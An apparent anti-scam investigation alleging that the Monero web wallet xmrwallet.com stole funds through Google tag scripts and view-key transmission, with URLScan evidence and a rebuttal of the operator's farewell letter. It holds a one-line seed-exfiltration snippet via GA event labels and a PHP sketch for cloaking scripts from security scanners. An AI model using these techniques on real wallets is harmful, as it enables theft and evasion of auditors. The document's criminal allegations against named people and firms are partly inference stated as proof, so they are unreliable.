How xmrwallet.com exploited Google gtag.js — 4 stages from victim to stolen XMR

Google's Dynamic Tagging on a "Privacy" Wallet

xmrwallet.com loaded Google's dynamic tagging infrastructure (gtag.js), 4 tracking property IDs, Google Ads Conversion Linker, and a DoubleClick pixel on a Monero wallet for 4+ years. The site's Content Security Policy blocked nothing. DDoS-Guard stored visitor IPs in plaintext cookies. No other cryptocurrency wallet in the industry does any of this. Here is the evidence.

Google Tracking IDs

Cookies per visitor

URLScan scans with GTM

Other wallets doing this

What Google's Dynamic Tagging Infrastructure Is

A technical clarification: xmrwallet.com loaded googletagmanager.com/gtag/js (the Global Site Tag loader), not the classic gtm.js container. The distinction is cosmetic. Both are remotely-managed JavaScript frameworks that fetch configuration from Google's servers at runtime, execute dynamic code in the browser, and cannot be pinned to a fixed hash (no SRI). Both can be reconfigured server-side without any change to the site's code. In this document, "GTM/gtag" refers to this entire dynamic tagging infrastructure.

This is not an analytics script. It is a remote code injection platform.

What Landing Pages Use gtag/GTM For

Live chat widgets. Trustpilot review popups. Facebook Pixel. A/B testing. Heatmaps. Conversion tracking.

These are legitimate marketing tools for pages that don't handle sensitive data.

What gtag/GTM Can Do on a Wallet

Read seed phrases from DOM. Override fetch() to intercept API calls. Exfiltrate private keys as GA event labels. Control Math.random() to predetermine key generation. Target specific users by country, referrer, or cookie value.

All of this without changing a single line of the wallet's code.

The difference between analytics and GTM:

Analytics (static .js file) = reads data about user behavior. Auditable. Version-locked. SRI-hashable.
gtag.js / GTM (dynamic loader) = fetches configuration from Google's servers at runtime. Can execute arbitrary JavaScript via linked tags and properties. Changes propagate instantly without deploy, code review, version control, or SRI hash. Invisible to auditors.

On a cryptocurrency wallet, Google's dynamic tagging infrastructure (gtag.js/GTM) is architecturally equivalent to a Remote Code Execution backdoor controlled by a third party. Marketing ends where private key entry begins. This is not an opinion — it is the universal industry standard, as demonstrated below.

His Own Code vs. Reality

The operator's website, GitHub repository, and Terms & Conditions make specific technical claims. Network traffic captures contradict every one of them.

What He Claims (in his own code/site)	What Network Traffic Shows	Source
"Your seed is never transmitted, received or stored."	Private view key transmitted in Base64 on every API call (40+ per session) via `session_key` parameter to 8 PHP endpoints	Live capture Feb 2026
"Everything happens locally in your browser."	Google's gtag.js executes in the same browser context as the wallet. Code delivered via Google's infrastructure can: (a) read spend_key from JS memory and hijack transactions — user clicks "Send 300 XMR" but gtag.js-delivered code builds a tx sending the full balance to the operator's address, signs it locally with the in-memory spend_key, and the UI shows "Success"; or (b) exfiltrate seed phrase at wallet creation via GA event labels (`gtag('event','backup',{label:btoa(seed)})`) — Google's servers then hold the stolen keys.	Live capture + URLScan
"We do not track you." (site footer)	4 Google tracking IDs. 9 cookies. Google Ads Conversion Linker. DoubleClick pixel. 28 requests to Google per session.	63 URLScan scans
"Open source" (links to GitHub)	Production site has 8 PHP endpoints absent from GitHub. `session_key` parameter not in public repo. Code differs from deployed version.	Code comparison
"TOR/Proxy Friendly. Anonymous." (app.html dialog)	DDoS-Guard cookie `__ddg9_` stores visitor IP in plaintext. Google Analytics receives IP on every request.	URLScan cookies tab
`description_risk_xmrwallet_text`: "no tracking" (in app.js source)	The same page loads `googletagmanager.com/gtag/js` 12 times per session	app.js + live capture

Google Analytics Does NOT Require Tag Manager

If the operator genuinely wanted analytics (page views, traffic stats), he could use:

// Option A: Static analytics.js (just analytics, no code injection) <script src="https://www.google-analytics.com/analytics.js"></script> // Fixed file. Auditable. SRI-hashable. Cannot inject arbitrary code. // Option B: Self-hosted (Plausible, Matomo) <script src="/js/plausible.js"></script> // No third-party servers. No cookies. GDPR-compliant. // Option C: Server-side only (count API calls) // Zero client-side impact. Just log requests to /auth.php. // What he ACTUALLY used: <script src="https://www.googletagmanager.com/gtag/js?id=UA-116766241-1"></script> // Dynamic container. Can inject ANY JavaScript. Changes without deploy. // No audit trail. No SRI. Invisible to code review. // WHY would a "privacy wallet" choose the ONLY option that enables remote code injection?

GTM Lives Across the Entire Wallet Session

app.html is a Single Page Application. Internal navigation (login → create → dashboard → send → receive) happens via hash changes (#/login.html, #/create.html, #/dashboard.html), not page reloads. This means:

Once GTM loads on app.html, it stays alive for the entire wallet session. The JavaScript context never resets. The browser never makes a new page request. GTM scripts see every DOM change: seed phrase rendered, keys displayed, balance shown, send form filled. There is no moment during the wallet session where GTM loses access.

The operator's defense — "app.html source has no GTM" — is irrelevant if GTM is injected via PHP at serve-time (invisible to archival crawlers) or carried over from main page context. Either way, once active, it persists through create/login/send/receive — the entire lifecycle where keys exist in memory.

Why Different Scans Show Different Results

URLScan results for xmrwallet.com show varying request counts and tracking IDs across scans of the same URL on the same day. This is not random — it is the expected behavior of dynamic tagging with evasion configuration. Three mechanisms explain every observed variation:

1. Dynamic Container Updates (The Invisible Backdoor)

The operator logs into their Google Analytics/gtag dashboard, adds or removes tracking properties, and publishes. The wallet's HTML, CSS, and visual UI remain 100% identical — but the invisible JavaScript executed in the victim's browser changes instantly. The different Google IDs found across URLScan scans (sometimes 2, sometimes 4) are simply different historical states of the operator's remote Google configuration.

Evidence: 4 Different Google IDs Across Scans

Scan 019c6233 (Feb 15, 2026): UA-116766241-1 + G-E3T1T1VKD1 (2 IDs)
Scan 019c7609 (Feb 2026): UA-116766241-1 + G-E3T1T1VKD1 + G-TDYCP6N15B + G-X9L39PK0C8 (4 IDs)
Same site. Same HTML. Different runtime configuration — changed remotely via Google's dashboard.

2. Conditional Firing & Evasion Triggers

Google's tagging platforms allow operators to set Triggers — conditions that determine when scripts fire. The operator could configure tracking to activate only for:

Specific referrers (user came from Google Ads, Reddit, or a bookmark — not from urlscan.io)
Specific geographic regions (target victims in certain countries only)
Click events (fire only after user clicks "Create Wallet" or "Login")
Cookie presence (fire only if _ga cookie exists = returning visitor, not first-time scanner)
Random sampling (fire for X% of users — selective profiling)

This explains why some URLScan results show 33–42 requests with Google tracking, while others of the same page show fewer. The scanner is seeing different trigger states — the operator's configuration decides who gets tracked and who doesn't.

3. Server-Side Script Cloaking (PHP)

The server runs PHP/8.2.29 (confirmed in response headers). PHP can serve visually identical HTML but conditionally inject or omit the <script> tag that loads Google's infrastructure based on:

// The server decides who sees the tracking script: $show_tracking = true; // Hide from known scanner IPs if (in_array($_SERVER['REMOTE_ADDR'], $scanner_ips)) $show_tracking = false; // Hide from headless browsers if (strpos($_SERVER['HTTP_USER_AGENT'], 'HeadlessChrome') !== false) $show_tracking = false; // Only show to users who visited the main page first (have GA cookie) if (!isset($_COOKIE['_ga'])) $show_tracking = false; // Result: scanners see clean page, real users see tracking

The combination of all three mechanisms means the operator had layered evasion: Google's remote config decides what code runs, gtag triggers decide when it fires, and PHP decides who even receives the script tag. No single scan can capture the full picture — which is exactly the point. The only complete record exists in Google's GTM/gtag configuration history, accessible via subpoena.

This is not speculation. The scan data proves it: same URL, same day, different request counts. 63 scans with tracking, 37 without. The variation is the evidence of conditional activation.

What xmrwallet.com Deployed

4 Google Tracking Identifiers

ID	Type	First Seen	Last Seen	Found In
UA-116766241-1	Universal Analytics	Oct 2021	Feb 17, 2026	HTML source (Wayback + 63 URLScan results)
G-E3T1T1VKD1	GA4	Jan 2024	Feb 17, 2026	URLScan HTTP transactions (loaded dynamically by gtag.js)
G-TDYCP6N15B	GA4	Seen in scan 019c7609		Additional GA4 property (testing/rotation)
G-X9L39PK0C8	GA4	Seen in scan 019c7609		Additional GA4 property (testing/rotation)

9 Cookies Set Per Visitor

Cookie	Set By	What It Does
_ga	Google Analytics	Unique visitor ID, persists 2 years. Tracks return visits.
_gid	Google Analytics	Session ID. 24-hour profiling.
_ga_E3T1T1VKD1	GA4	GA4 session cookie. Confirms G-E3T1T1VKD1 property active.
_gat_gtag_UA_116766241_1	GTM/UA	Rate limiter. Proves GTM + UA integration active.
_gcl_au	Google Ads	Conversion Linker. Tracks which paid ad campaign brought the visitor. The operator was buying victims via Google Ads.
__ddg1_	DDoS-Guard	WAF session token.
__ddg8_	DDoS-Guard	WAF authentication.
__ddg9_	DDoS-Guard	Visitor's IP address in plaintext. Value: `217.138.216.158`
__ddg10_	DDoS-Guard	Timestamp.

Source: URLScan.io scan 019c605d-4a6d-71ab-82a1-df03ef60ae9a (Feb 15, 2026) — behaviour tab, cookies section.

Security Headers: Nothing Protected

content-security-policy: upgrade-insecure-requests; ← EMPTY. No script-src. No connect-src. Blocks nothing. x-content-security-policy: allow 'self' ← Deprecated. Ignored by all modern browsers. strict-transport-security: max-age=600 ← 10 minutes. Industry minimum is 1 year. permissions-policy: MISSING ← No feature restrictions at all. x-powered-by: PHP/8.2.29 ← Dynamic server. Can serve different HTML to different users.

The empty CSP means: Any script loaded via GTM can read any DOM element, override any browser API, and send data to any external server. There is zero browser-level protection. Compare with Blockchain.com which uses script-src 'nonce-xxx' 'strict-dynamic' — even if GTM were present, injected scripts would be blocked without a valid nonce.

What Google Saw

For 4+ years, every xmrwallet.com session generated 28+ requests to Google servers. Google received:

Data	How Google Got It	Implication
Every page visit inside the wallet	GA pageview events	Google knows who uses a Monero wallet
Browser fingerprint (screen, timezone, language, OS)	GA client hints	User re-identifiable across sessions
IP address	Every HTTP request to analytics.google.com	Geographic location, ISP, potentially identity
Which ad brought the user	_gcl_au + Google Ads conversion data	Full acquisition funnel tracked
Session behavior (time on page, clicks, scroll)	GA4 enhanced measurement	Behavioral profiling of wallet users
Return frequency	_ga persistent Client ID (2-year)	"Is this user coming back to check their balance?"
Potentially: seed phrases, private keys	GTM Custom HTML can send any data as GA event labels	If used, Google's databases contain stolen keys

A subpoena to Google for property UA-116766241-1 would reveal:
1. GTM Container History — every Custom HTML tag, every trigger, every publish date. If seed phrases were exfiltrated via event labels, this is where the proof lives.
2. GA Event Data — check for Base64-encoded payloads in event labels/categories. These would be stolen keys.
3. Google Ads Campaigns — keywords, spend, targeting. Likely "monero wallet", "XMR wallet", "anonymous crypto".
4. Audience Data — total unique visitors = total potential victims. Geographic distribution = jurisdictions affected.
5. Account Owner — the email behind UA-116766241-1 identifies the operator.

No Other Wallet Does This

We scanned every major web-based cryptocurrency wallet on URLScan.io. The result is unambiguous:

Wallet	Type	Requests	Google IDs	Tracking Cookies	CSP	URLScan
Ian Coleman BIP39	Key generator	1	0	0	N/A (static)	019dfffa
MyMonero	Monero web wallet	13	0	0	Cloudflare	0199729f
MyEtherWallet	Ethereum web wallet	5	0	0	Cloudflare	019bd152
Guarda /app	Multi-currency wallet	51 scripts	0	0	Isolated from landing	Live May 2026
Blockchain.com login	BTC/ETH web wallet	77	1 (GA4)	Yes	nonce + strict-dynamic	019e1c5a
xmrwallet.com	Monero web wallet	33–42	4	9 (incl Ads, IP)	EMPTY	019c605d

Key Observation: Guarda Wallet

Guarda runs GTM (GTM-N5WZTMXC) on their marketing landing page — that's normal. But when you enter /app where keys are handled: zero tracking, zero cookies, zero external scripts. Marketing and key management are properly isolated. This is how it's supposed to work. xmrwallet.com did the opposite: GTM on the same domain, same origin, same session as the seed phrase input.

xmrwallet.com is the only cryptocurrency wallet in the industry that ran:
• Google Tag Manager (remote code injection) on a key-entry page
• Google Ads Conversion Linker (paid victim acquisition tracking)
• DoubleClick advertising pixel (cross-web ad tracking)
• 4 simultaneous Google tracking properties
• An empty Content Security Policy that blocked nothing
• DDoS-Guard cookies storing visitor IPs in plaintext

While simultaneously claiming: "We do not track you."

The Operator Is Deleting URLScan Results

The pattern is visible in the scan data itself:

Before our report (Feb 15, 2026): Scan 019c605d shows 33 requests, 9 cookies (incl. Google Ads, plaintext IP), 4 Google tracking IDs active.
We publish our findings (Feb 16–18).
72 hours later (Feb 19): Scan 019c7739 shows 2 requests. Zero Google. Zero cookies. Complete erasure.

He didn't fix a bug. He didn't publish a transparency notice. He silently deleted everything and hoped nobody saved the old scans. We saved 63 of them. Now he's requesting deletion of the URLScan results themselves.

Since our investigation began, the operator has systematically erased evidence across every platform. The Google tracking code was removed within 72 hours. Now URLScan results are being targeted.

What URLScan Shows Over Time

Period	Main Page Requests	Google IDs	Status
Jan 2024 → Feb 15, 2026	33–42	UA-116766241-1 + G-E3T1T1VKD1	Active tracking
Feb 19, 2026	2	None	All tracking erased (72 hrs after notice)
Feb 21 → Apr 10, 2026	26	None	Redirect to xmrwallet.cc
Apr 20 → present	2	None	Site effectively dead

What We Archived Before Deletion

100

URLScan results saved

With Google tracking

Wayback snapshots

Competitor scans

All 100 URLScan result pages have been downloaded as full HTML archives. Key scans:

# Scans with Google tracking (63 total). Sample: 4859891f 2024-01-10 42 reqs app.html UA-116766241-1 + G-E3T1T1VKD1 89c25cff 2024-03-16 41 reqs app.html UA-116766241-1 + G-E3T1T1VKD1 019c7609 2026-02-?? ?? reqs UA-116766241-1 + G-E3T1T1VKD1 + G-TDYCP6N15B + G-X9L39PK0C8 ← 4 IDs! 019c6233 2026-02-15 36 reqs last scan with tracking 019c7739 2026-02-19 2 reqs ← ALL TRACKING GONE (72 hrs after notice) # Wayback Machine snapshots: 20210927 Last clean snapshot (no tracking) 20211006 First snapshot WITH UA-116766241-1 ← GTM added between Sep 27 and Oct 6, 2021 20251226 Still active (Dec 2025) 20260223 app.html source: ZERO Google references ← cloaking confirmed

For URLScan Pro subscribers: Check scan deletion history for xmrwallet.com. We observe the total number of public scans decreasing. If scans showing Google tracking are being removed via deletion requests, this is evidence of active evidence tampering.

For law enforcement: A subpoena to Google for gtag/GTM configuration history of UA-116766241-1 and linked properties (G-E3T1T1VKD1, G-TDYCP6N15B, G-X9L39PK0C8) would reveal:
• Exactly what JavaScript code was pushed to victims' browsers and when
• GA event data — if seeds were exfiltrated as event labels, Google holds every stolen key
• Which wallet addresses were created through the site (victim count + addresses)
• How much was stolen — transaction amounts visible if sent as event values
• Who the operator is — the Google account email behind the property
• Google Ads campaign data — how much he paid to acquire victims, which keywords
Google's tag infrastructure is effectively a complete forensic record of the entire operation. The operator deleted his site but he cannot delete Google's server-side logs.

How It Worked: Step by Step

This simulation shows what happened during every xmrwallet.com session. Every step is based on captured network traffic and URLScan evidence.

Session Simulation

Response to xmrwallet.com "Farewell Letter" — April 2026

In April 2026, the operator published a "Brief Letter and Final Update." Below is our response. Not to convince the operator — that is pointless — but to document the lies for the public record.

⚠ Why did he "leave"? Not guilt. Evidence destruction.

The timing is not coincidental:

Namesilo received federal investigation notice — began cooperating, transferred domain
URLScan scans showing Google tracking were being archived — operator started requesting deletions
Trustpilot reviews documenting theft persisted despite removal requests — some survived 1+ years before deletion
Reddit posts contradicting ToS claims were being screenshotted — operator's own words as evidence
Technical analysis published — GitHub Pages investigation with Terms of Service breakdown

The "farewell" letter is not a goodbye. It is a coordinated evidence destruction operation:

Publish emotional letter to frame departure as voluntary
Delete URLScan scans showing tracking infrastructure
Remove Reddit posts that contradict claims
Transfer domain away from cooperating registrar
Remove the wallet code so independent verification becomes harder

We expected this. Everything is archived. We built a working replica. The evidence is decentralized.

On "The view key is required by the service"

From their Terms of Service (archived Dec 2023):

xmrwallet Terms, Section 4

"The view key of your account is temporarily stored in memory by the service."

This contradicts their own opening statement: "Our services provides in-browser monero blockchain access and generates new seeds client-side."

If the view key is sent to the server and "stored in memory" — the architecture is server-side scanning, not client-side. Every legitimate Monero wallet (Monero GUI, Feather, Monerujo, Cake Wallet) scans the blockchain locally using WebAssembly or native code. The view key never leaves the device.

The operator knew this from day one. Their own Reddit posts boasted about being "more private than MyMonero" — while running 4 Google tracking IDs and sending the view key to a server behind Russian DDoS-Guard infrastructure.

The view key is a private key. The operator deliberately narrows "private key" to mean only the spend key (key for spending funds), creating the false impression that the view key is harmless. In Monero's cryptographic model, the private view key reveals: all incoming transactions, amounts, sender addresses, and your complete balance history. Combined with IP/session data from the server, this enables total deanonymization — which is exactly what we demonstrated.

On the Terms of Service — Forensic Analysis

The ToS was clearly written without legal review, in broken English suggesting OCR artifacts or machine translation. This is a direct marker of a fraudulent service pretending to be Canadian:

What they wrote	What they meant	Section
Laws can be aspirated	Laws can be arbitrated	14
hold harness	hold harmless	13
maximum extern	maximum extent	2
validly exiting	validly existing	1
obfusticated	obfuscated	4
severalty	severability	15

The person who registered as a Canadian government official (Nathalie Roy) couldn't write basic English legal terms. These aren't typos — they're markers of someone who doesn't operate in English legal systems.

On the Signature

Previous communications: Best Regards, Nathalie or just — N. Reddit responses to victims signed as Nathalie. Now, in the farewell letter:

Farewell Letter, April 2026

"With deep gratitude,
— The Creator of xmrwallet.com"

No longer Nathalie. No longer a person. "The Creator." They understand investigations are active. They understand the name is burned. The shift from personal identity to abstract title is not humility — it's legal distancing.

On "Playing Dumb" — A Russian Scammer Pattern

The farewell letter performs ignorance. This is characteristic of a specific scam culture:

Internal logic of the operator (reconstructed from behavior):

"Monero is anonymous, there's no proof — they can't prosecute"
"5 years since the theft — the money is clean"
"I didn't steal from an exchange, crypto is just a token, not real money"
"I'll create fake attacks on myself — they'll blame those"
"Most visitors are hackers and criminals themselves"
"I'm the smartest because I stole the most"
"If they don't write the exact theft method — they don't know it"

These rationalizations are how scam operators sleep at night. They don't withstand 30 seconds of technical scrutiny.

On Deleting URLScan Evidence

After our investigation began documenting the Google tracking IDs via URLScan.io, the operator started requesting deletion of scans that showed the tracking infrastructure. 63 public scans documented the presence of gtag.js, Google Ads, and DoubleClick on a "privacy wallet." The operator knows that no legitimate wallet runs these scripts. Deleting the evidence doesn't make it disappear — we archived everything, and we reconstructed the mechanism:

Live Proof-of-Concept: We Rebuilt The Scam

Since the operator is deleting scans, we built an exact replica of the theft mechanism. Same request structure. Same session_key format. Same view key exfiltration. Even the same Google tracking ID (data goes to their property — they can change it in our operator panel).

URLScan: Landing Page (GA Enabled)

View full scan

13 requests — 10 to Google (googletagmanager, analytics, doubleclick, ads)

Google Ads Conversion Linker active. DoubleClick cross-tracking. Remarketing pixel. On a "privacy wallet."

URLScan: Wallet Page (No GA)

View full scan

7 requests — 0 to Google. Clean source code. No analytics.

But every request contains session_key with the base64-encoded view key. The theft happens silently.

The demo includes:

Full wallet replica — seed generation (real Monero 1626-word dictionary with CRC32 checksum), login, dashboard, send/receive, subaddresses, QR codes
Operator panel — balance manipulation, fake transactions, theft strategies (silent skim, sync error, deposit trap), session tagging, cloaking configuration, connection/IP history
View key risk visualization — blockchain scanner simulation, identity correlation graph (real IP + Tor = same person), attack timeline, privacy comparison
Network intelligence graph — interactive canvas showing how multiple wallets, IPs, exchanges, and darknet addresses connect through the operator's data
Deep fingerprinting — canvas hash, WebGL/GPU, audio context, fonts, media devices, and 30+ data points the operator collects on every visitor
Post-theft reports — FSB forwarding (DDoS-Guard already has the data), Interpol (cross-border jurisdiction), darknet sale (KYC-linked wallets), blackmail dossier

For those who think deleting the link will help: this demo is static HTML. It runs on Cloudflare Pages. If the link dies, it goes on IPFS in 10 minutes. The code is public. The evidence is archived. The URLScan results are immutable. The operator's genius plan of "delete everything and pretend it didn't happen" does not work when the investigation is decentralized.

Why Google Tag Manager Is Not "Just Analytics"

For security professionals, this is obvious. For everyone else:

1. Remote Code Execution by design. A secure wallet must fix its code via SRI (Subresource Integrity). gtag.js is a dynamic loader — it fetches updated payloads from Google at runtime, ignoring SRI. Embedding this in a zone where private keys exist is a voluntary backdoor for RCE. The wallet code can change at any second without deployment.

2. DOM scraping and form interception. DoubleClick and GA4 Enhanced Measurement automatically attach listeners to DOM elements, intercept form submits, and read input data for profiling. If this script runs in the same origin where a seed phrase is entered, the risk of key leakage into advertising databases is 100%.

3. Sandbox destruction. Proper architecture requires strict Content Security Policy blocking all external interaction (connect-src 'self'). Embedding gtag.js requires opening CSP for google-analytics.com and doubleclick.net. Wallet security now depends on the security of Google's advertising infrastructure. Any ad pixel vulnerability or compromised marketer account leads to instant spend_key theft from browser memory.

4. Total deanonymization. DoubleClick Floodlight links user actions across sites into a single profile. Using it on a Monero wallet connects your IP, browser fingerprint, and wallet creation to your global advertising profile (search history, YouTube, other sites). For a privacy cryptocurrency, this is architectural suicide.

Anyone with minimal security knowledge understands that CORS policies, CSP headers, and script isolation of a wallet claiming "privacy by design" are fundamentally incompatible with loading advertising infrastructure. The app page didn't have the tracker in the source — correct. But it wasn't isolated. And we demonstrated exactly how this works.

Namesilo's Response

After understanding there was a federal investigation, Namesilo:

Launched domain discount promotions (to make our pricing statements outdated)
Transferred the protected domain to Namecheap (to distance themselves)
The information written in our investigation was accurate at the time of writing, signed and timestamped

The Bottom Line

The operator believes they're a genius because they stole a lot of money — possibly more than the annual budget of their hometown. They believe that because the investigation didn't immediately spell out the exact theft method, we didn't know. Seriously?

We reconstructed the entire theft mechanism. We used the same Google tracking ID. We built the operator panel showing what they saw. We demonstrated the view key exfiltration, the fingerprinting, the connection between Tor and real IP addresses. We showed the cloaking, the strategies, the post-theft data exploitation. This was a primitive scam run for 8 years on the assumption that Monero users wouldn't notice. They noticed. We documented it. It's over.

As we have said before: no sense of remorse, no understanding of what they did and what they have done will come until there is a search/arrest warrant and they are stripped of access to the stolen money. Then, perhaps (we doubt it), they will remember that they do not run the world. This applies to both overconfident parties — possibly the same person.

All URLScan scans, Wayback snapshots, and competitor comparisons archived locally and on IPFS. 100 scans + 6 snapshots + 5 competitor wallets = immutable evidence.

Live Demo: xmrwallet-demo.pages.dev • URLScan #1 (GA) • URLScan #2 (no GA)

Original analysis: phishdestroy.github.io/DO-NOT-USE-xmrwallet-com